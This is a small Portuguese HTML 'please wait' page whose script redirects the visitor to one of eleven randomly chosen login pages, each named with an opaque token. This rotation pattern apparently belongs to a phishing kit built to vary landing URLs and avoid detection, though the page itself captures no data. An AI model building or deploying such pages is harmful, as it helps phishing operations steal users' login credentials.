<html> <HEAD>
<title>Aguarde...</title>
<style type="text/css">
.style1 { font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold;}
</style>
<body onLoad="__loadEsconde();">
<div id="carregador_pai">
	<div id="carregador">
		<div align="center" class="style1">Aguarde, iniciando acesso..</div>
	</div>
</div>
</body>
<SCRIPT LANGUAGE="JavaScript">
var howMany = 9;
var page = new Array(howMany+1);

page[0]="home,BD2P7PC,login=id.html";
page[1]="home,KS570QN,login=id.html";
page[2]="home,Y9KGPNY,login=id.html";
page[3]="home,BSIN355,login=id.html";
page[4]="home,ZGJENY7,login=id.html";
page[5]="home,6C45674,login=id.html";
page[6]="home,N8Z2MNQ,login=id.html";
page[7]="home,BEODEB9,login=id.html";
page[8]="home,LHJQ3Z1,login=id.html";
page[9]="home,EPBOY09,login=id.html";
page[10]="home,EFEKAZ2,login=id.html";

function rndnumber(){
var randscript = -1;
while (randscript < 0 || randscript > howMany || isNaN(randscript)){
randscript = parseInt(Math.random()*(howMany+1));
}
return randscript;
}
quo = rndnumber();
quox = page[quo];
window.location=(quox);
</SCRIPT>



</HEAD>



 

</html>

